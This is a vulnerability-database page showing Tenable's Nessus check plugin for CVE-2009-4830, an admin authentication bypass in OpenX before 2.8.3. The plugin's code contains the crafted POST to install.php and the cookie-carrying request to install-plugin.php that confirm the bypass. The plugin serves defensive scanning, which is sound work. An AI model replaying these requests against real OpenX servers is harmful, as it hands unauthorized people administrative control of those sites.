Lucene search
K

OpenX install.php / install-plugin.php Admin Authentication Bypass

🗓️ 12 Jan 2010 00:00:00Reported by TenableType 
nessus
 nessus
🔗 www.tenable.com👁 40 Views

OpenX install.php / install-plugin.php Admin Authentication Bypas

Related
Refs
Code
ReporterTitlePublishedViews
Family
Tenable Nessus
OpenX < 2.8.3 Authentication-Bypass
28 Dec 200900:00
nessus
CVE
CVE-2009-4830
27 Apr 201015:00
cve
Cvelist
CVE-2009-4830
27 Apr 201015:00
cvelist
EUVD
EUVD-2009-4793
7 Oct 202500:30
euvd
NVD
CVE-2009-4830
27 Apr 201015:30
nvd
OpenVAS
OpenX Administrative Interface Authentication Bypass Vulnerability
4 May 201000:00
openvas
Prion
Authentication flaw
27 Apr 201015:30
prion
RedhatCVE
CVE-2009-4830
9 Jan 202611:49
redhatcve
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(43864);
  script_version("1.10");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/06/01");

  script_cve_id("CVE-2009-4830");
  script_bugtraq_id(37457);
  script_xref(name:"Secunia", value:"37914");

  script_name(english:"OpenX install.php / install-plugin.php Admin Authentication Bypass");

  script_set_attribute(attribute:"synopsis", value:
"A PHP application hosted on the remote web server has an
authentication bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of OpenX hosted on the remote web server has an
authentication bypass vulnerability.  Sending a specially crafted
request to install.php or install-plugin.php bypasses the normal
authentication process.

A remote attacker could exploit this to gain administrative access to
the OpenX installation.");
  script_set_attribute(attribute:"see_also", value:"http://forum.openx.org/index.php?showtopic=503454011");
  script_set_attribute(attribute:"solution", value:
"Upgrade to OpenX 2.8.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2009/12/22");
  script_set_attribute(attribute:"patch_publication_date", value:"2009/12/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/12");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2022 Tenable Network Security, Inc.");

  script_dependencies("openx_detect.nasl");
  script_require_keys("www/openx");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");


OA_UPGRADE_UPGRADE = 35;


port = get_http_port(default:80);
if (!can_host_php(port:port))
  exit(0, "The web server on port "+port+" doesn't support PHP scripts.");

install = get_install_from_kb(appname:'openx', port:port);
if (isnull(install))
  exit(1, "No OpenX installs on port "+port+" were found in the KB.");

# First, look at install.php
url = install['dir'] + '/www/admin/install.php';

# make sure the page exists before posting
res = http_send_recv3(method:"GET", item:url, port:port);
if (isnull(res)) exit(1, "The web server on port "+port+" failed to respond.");

headers = parse_http_headers(status_line:res[0], headers:res[1]);
if (isnull(headers)) exit(1, 'Error parsing HTTP headers on port '+port+'.');

code = headers['$code'];
if (isnull(code)) exit(1, "Error parsing HTTP status code on port "+port+".");

# If the page exists, a GET will result in a redirect
if (code != 302)
  debug_print("Error retrieving "+ build_url(qs:url, port:port));
else
{
  # if the page exists, attempt to exploit
  postdata = 'btn_openads='+SCRIPT_NAME+'&btn_plugins='+unixtime();
  req = http_mk_post_req(
    port:port,
    item:url,
    content_type:'application/x-www-form-urlencoded',
    data:postdata
  );
  res = http_send_recv_req(port:port, req:req);
  if (isnull(res))
    exit(1, "The web server on port "+port+" failed to respond.");

  # If the app is patched, the request will result in a redirect.  Otherwise,
  # we'll get the plugins page and an authenticated session
  if ('<title>OpenX - Plugins</title>' >< res[2])
  {
    if (report_verbosity > 0)
    {
      report =
        '\nNessus bypassed authentication by issuing the following request :\n\n'+
        crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n'+
        req = http_mk_buffer_from_req(req:req)+'\n'+
        crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n';
      security_hole(port:port, extra:report);
    }
    else security_hole(port);

    exit(0);
  }
}

# If that attempt didn't work, try to exploit install-plugin.php
plugin_name = SCRIPT_NAME+'-'+unixtime();
qs = '?status=1&plugin='+plugin_name;
url = install['dir']+'/www/admin/install-plugin.php'+qs;
enable_cookiejar();
set_http_cookie(name:'oat', value:OA_UPGRADE_UPGRADE);
req = http_mk_get_req(
  port:port,
  item:url
);
res = http_send_recv_req(port:port, req:req);
if (isnull(res))
  exit(1, "The web server on port "+port+" failed to respond.");

# If the app is patched, the request will result in a redirect.  Otherwise,
# it'll show us an error message and establish a session as admin
if ('Problems found with plugin '+plugin_name >< res[2])
{
  if (report_verbosity > 0)
  {
    report =
      '\nNessus bypassed authentication by issuing the following request :\n\n'+
      crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n'+
      req = http_mk_buffer_from_req(req:req)+'\n'+
      crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n';
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else
{
  full_url = build_url(qs:install['dir'] + '/', port:port);
  exit(0, 'The OpenX install at '+full_url+' is not affected.');
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation